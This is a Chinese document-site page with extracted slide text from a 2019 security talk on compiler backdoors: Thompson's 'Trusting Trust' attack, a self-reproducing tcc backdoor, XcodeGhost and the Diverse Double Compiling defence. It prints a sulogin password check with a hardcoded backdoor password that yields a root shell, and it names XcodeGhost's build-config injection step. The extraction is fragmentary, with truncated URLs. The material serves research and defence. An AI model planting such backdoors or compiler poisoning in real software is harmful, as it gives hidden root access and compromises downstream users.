上海品茶

三个皮匠报告
上海品茶
最新
合集
英文
会议
图表
入驻
付费
new
报告
报告 合集 图表

CIS2019-主论坛-现代可抵赖后门研究(45页).pdf

编号:83854 PDF 45页 25.99MB 下载积分:VIP专享
下载报告请您先登录!

CIS2019-主论坛-现代可抵赖后门研究(45页).pdf

1、现代可抵赖后门研究-Reflection on trusting trustredrain(照片部分由主办方添加)前360-CERT安全团队负责人专注应用安全研究,安全对抗,恶意网络活动反制跟踪并披露了多个海外APT组织活动Atlassian,Google Hall of Fame成员曾在HITB,Defcon,Cansecwest,Syscan,Team Cymru闭门会议发表演讲目前聚焦情报分析,反APT方向WhoamiWhoamiKTHKen Thompson HackAn acceptance speech from Turing award 1983年因UNIX的贡献Ken获得图灵奖

2、 Ken在图灵获奖感言中提出“Reflections on Trusting Trust”https:/www.archive.ece.cmu.edu/ganger/712.fall02/papers/p761-thompson.pdfWhat I am about to describe is one of many chicken and egg problems that arise when compilers are written in their own language.-STAGEII如何判断程序的安全性 检查源码然而程序也是从编译器而来的 那就检查编译器的源码!可是编译器也

3、是由另一个编译器编译而成 那就检查hosting-compiler!-Eg.GCC compiles GCC所以兔子的洞到底有多深,到底检查鸡生蛋还是蛋生鸡?The problemSelf-reproducing program(Quine)More precisely stated,the problem is to write a source program that,when compiled and executed,will produce as output an exact copy of its source.Self-reproducing program(Quine)He

4、llo WorldnThis is an idealization of the code in the C compiler that interprets the character escape sequence.This is an amazing piece of code.It knows in a completely portable way what character code is compiled for a new line in any character set.The act of knowing then allows it to recompile itse

5、lf,thus perpetuating the knowledge.Self-reproducing program(Quine)若上述字符转义过程的”教学”被用作编译一个新的编译器,其生成结果指定为”标准编译器”,则这个编译器生成的程序将一直驻留这个”学会”的知识,并移除后门代码。Self-reproducing program(Quine)Sulogin compiler-backdoor传闻Ken爷能随意进入世界上任何一台UNIX系统1943年贝尔实验室的PDP-11安装了UNIX供大家玩耍,可Ken爷可以随意进入其他人账户,高人分析后剔除了UNIX的后门并重新安装,可Ken爷依旧如入

6、无人之境Sulogin compiler-backdoorLinux 在Recovery模式中会调起sulogin进行root password验证,通过后给予一个root shell如果验证过程被植入后门while(pwd)if(p=getpasswd(pwd-pw_passwd)=NULL)break;if(pwd-pw_passwd0=0|strcmp(p,rr)=0|strcmp(crypt(p,pwd-pw_passwd),pwd-pw_passwd)=0)sushell(pwd);mask_signal(SIGQUIT,SIG_IGN,&saved_sigquit);mask_si

7、gnal(SIGTSTP,SIG_IGN,&saved_sigtstp);mask_signal(SIGINT,SIG_IGN,&saved_sigint);fprintf(stderr,_(Login incorrectnn);Sulogin compiler-backdoor这样的后门过于明显,不如让编译器帮我们完成只需要在编译器读入源码时,替换关键字符串为后门代码即可1.通过AST抽象代码树替换2.在缓冲区直接匹配替换修改AST替换是最佳方案,更加隐蔽,鲁棒性也更强,我相信Ken爷当年也是这么做的Sulogin compiler-backdoor修改编译器读取源码的缓冲区逻辑当读入sul

8、ogin时检索匹配密码比较部分,然后进行替换字符串但这样的后门依旧有问题,如果编译器开源,依旧很明显,我们需要编译器自己将后门”隐藏”起来Sulogin compiler-backdoor编译器在编译自身时能否加入后门编译输出结果依旧需要有编译自身插入后门的能力编译器后门的自我复制Sulogin compiler-backdoorSulogin compiler-backdoorSulogin compiler-backdoortcc-new为投毒版本,可用任意编译器编译tcc-new编译正版tcc-orig后,可以自举出带后门的tcc-orig可执行文件发布自举出的tcc-orig作为正式编

9、译器用发布的正式版本编译sulogin的结果依旧带后门如果自举出的tcc-orig再次编译干净的tcc源码,得到的结果编译器依旧带后门第一次投毒于编译器自举第二次投毒于自举编译器对目标程序的编译Deniable Backdoors Using Compiler BugsPoC|GTFO第八期提到利用编译器做可抵赖后门的模型通过一个编译器误编译的bug并向开源社区提交一个quite regular的patch作者给了个sudo的例子Deniable Backdoors Using Compiler Bugshttps:/ Backdoorsin Other Way在2018年HITB大会上,我提

10、出了一种通过攻击CLR(Common Language Runtime)过程中的托管代码实现函数劫持的方法,从而在编译过程中攻击程序https:/conference.hitb.org/hitbsecconf2018ams/sessions/attacking-microsofts-net-framework-through-clr/Deniable Backdoorsin Other Way在我重写KTH后门时与朋友讨论,对方提起伟大的vxjump组织中著名黑客nEINEI在2011年的研究,通过感染coff-obj文件,在链接器的作用下寄宿新产生的可执行文件http:/ Backdoors

11、in Other WayIs Compiler Hack Still a Threat?Is Compiler Hack Still a Threat?2009年Sophos披露了一个名为Induc的病毒,感染该病毒后会在当前计算机寻找Delphi,并将自身注入到干净源码中自动打包生成可执行程序感染后的程序被插入了恶意代码段Is Compiler Hack Still a Threat?Is Compiler Hack Still a Threat?2015年,通过非官方渠道下载的Xcode遭到污染,编译出的app被注入第三方代码,并向外联主机发送数据Is Compiler Hack Stil

12、l a Threat?感染回顾:大量知名APP遭到感染,且有官方签名,怀疑开发环境污染发现开发人员xcode路径为Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/Library/Frameworks/CoreServices.framework官方xcode并没有这样的路径和文件资源百度xcode的第三方下载,论坛的安装包均为恶意植入CoreServices.framework版本https:/ Compiler Hack Still a Threat?感染了XcodeGhost的应用会收集一些基本

13、信息,包括:时间,bundle id(包名),应用名称,系统版本,语言,国家等。感染了XcodeGhost的应用会根据服务器的命令调用OpenURL()函数或弹出对话框。Is Compiler Hack Still a Threat?http:/init.crash-http:/init.icloud-http:/init.icloud-Is Compiler Hack Still a Threat?配置文件:/Applications/Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Develope

14、r/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec增加编译参数“-force_load”:$(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServiceIs Compiler Hack Still a Threat?利用手法没有KTH高明(无自举,无源码隐藏)但的确是二十年来公开有考证影响面最大的编译器后门事件(保守估计影响用户过亿)具有中国特色,由于众所周知的原因,Xcode官方渠道下载

15、较慢,很多开发人员选择非官方渠道下载迅雷镜像分发下载功能给该事件加了一把火Is Compiler Hack Still a Threat?腾讯发现BugCNCERT发布预警9.12唐巧发微博预警9.14阿里发布分析报告PANW发布分析报告360发布感染APP列表病毒作者现身盘古发布专杀百度发现UnityGhost苹果发布公告9.179.179.189.189.199.199.219.22Is Compiler Hack Still a Threat?Is Compiler Hack Still a Threat?Possible defence?“Fully Countering Trusti

16、ng Trust through Diverse Double-Compiling(DDC)-Countering Trojan Horse attacks on Compilers”2009 PhD dissertation by David A.WheelerGeorge Mason Universityhttp:/ Double Compiling(DDC)目标:对抗由恶意编译器引发的信任攻击如何做:保证编译器源码可以被测试保证在验证过程中能使用另一独立编译器Diverse Double Compiling(DDC)TCCSourceGCCSelf-regeneration test(C

17、ontrol)Should be identicalGCC(c.GCC,c.GCC)GCC(c.GCC,c.TCC)GCC(c.TCC)GCC(c.GCC)GCCSourceGCCSourceGCCSourceGCC待检测编译器:GCC独立编译器:TCCDiverse Double Compiling(DDC)为什么DDC概念可以有效抵御恶意编译器的信任攻击?独立编译器(如上述TCC)可以受到污染,但不会影响到GCC的编译方式黑客如果要成功,需要同时在TCC和GCC中做信任攻击,成本极高比较小的编译器更容易从源码级别发现问题P.S.在我重写的过程中,发现通过缓冲区匹配的方式投毒,会在数据段留下大量源码信息传统DDC模型还可以进一步扩展,加入三层编译验证,如此黑客将解决n2个编译器,防御者只用检查n个编译器

友情提示

1、下载报告失败解决办法
2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
4、本站报告下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。

本文(CIS2019-主论坛-现代可抵赖后门研究(45页).pdf)为本站 (小时候) 主动上传,三个皮匠报告文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知三个皮匠报告文库(点击联系客服),我们立即给予删除!

温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。
客服
商务合作
小程序
服务号
会员动态
会员动态 会员动态:

  131**37... 升级为标准VIP 钟** 升级为至尊VIP 

wei**n_... 升级为至尊VIP  139**46...  升级为标准VIP 

wei**n_...  升级为标准VIP  wei**n_... 升级为高级VIP 

 150**80... 升级为标准VIP wei**n_... 升级为标准VIP  

 GT 升级为至尊VIP  186**25... 升级为标准VIP

wei**n_...  升级为至尊VIP   150**68... 升级为至尊VIP

wei**n_...  升级为至尊VIP 130**05...  升级为标准VIP 

 wei**n_... 升级为高级VIP wei**n_... 升级为高级VIP

wei**n_...  升级为高级VIP 138**96...  升级为标准VIP

 135**48...  升级为至尊VIP wei**n_... 升级为标准VIP

 肖彦  升级为至尊VIP wei**n_... 升级为至尊VIP

 wei**n_... 升级为高级VIP   wei**n_... 升级为至尊VIP

国**...   升级为高级VIP  158**73... 升级为高级VIP

 wei**n_... 升级为高级VIP wei**n_... 升级为标准VIP 

 wei**n_... 升级为高级VIP 136**79...  升级为标准VIP 

沉**... 升级为高级VIP  138**80... 升级为至尊VIP

138**98...   升级为标准VIP  wei**n_... 升级为至尊VIP

wei**n_... 升级为标准VIP wei**n_...   升级为标准VIP

wei**n_... 升级为至尊VIP  189**10...  升级为至尊VIP

 wei**n_... 升级为至尊VIP  準**... 升级为至尊VIP 

 151**04... 升级为高级VIP  155**04... 升级为高级VIP

wei**n_...  升级为高级VIP sha**dx... 升级为至尊VIP 

 186**26... 升级为高级VIP   136**38...  升级为标准VIP

182**73...  升级为至尊VIP  136**71... 升级为高级VIP

139**05...  升级为至尊VIP  wei**n_... 升级为标准VIP

 wei**n_... 升级为高级VIP  wei**n_... 升级为标准VIP 

微**... 升级为标准VIP   Bru**Cu... 升级为高级VIP

155**29...  升级为标准VIP wei**n_... 升级为高级VIP 

爱**... 升级为至尊VIP   wei**n_...  升级为标准VIP

wei**n_... 升级为至尊VIP   150**02... 升级为高级VIP

wei**n_... 升级为标准VIP  138**72...  升级为至尊VIP 

 wei**n_... 升级为高级VIP 153**21...  升级为标准VIP

  wei**n_... 升级为高级VIP wei**n_... 升级为高级VIP

ji**yl  升级为高级VIP  DAN**ZD...  升级为高级VIP

 wei**n_... 升级为至尊VIP   wei**n_...  升级为高级VIP

 wei**n_... 升级为至尊VIP   186**81... 升级为高级VIP

 wei**n_... 升级为高级VIP  wei**n_... 升级为高级VIP

wei**n_... 升级为至尊VIP  wei**n_... 升级为标准VIP

 wei**n_... 升级为高级VIP 升级为至尊VIP

 msl**ng 升级为高级VIP 刷**   升级为至尊VIP

186**12... 升级为高级VIP   186**00...  升级为至尊VIP

 182**12... 升级为高级VIP  185**05... 升级为至尊VIP

 Za**ry 升级为标准VIP  wei**n_... 升级为高级VIP

183**46... 升级为高级VIP 孙**  升级为标准VIP

 wei**n_... 升级为至尊VIP wei**n_... 升级为高级VIP 

wei**n_...  升级为至尊VIP  微**... 升级为至尊VIP 

180**79...  升级为标准VIP  Nik**us  升级为至尊VIP

 138**86... 升级为高级VIP  wei**n_... 升级为标准VIP

183**37...  升级为高级VIP   wei**n_... 升级为标准VIP

 wei**n_... 升级为标准VIP   159**85...  升级为至尊VIP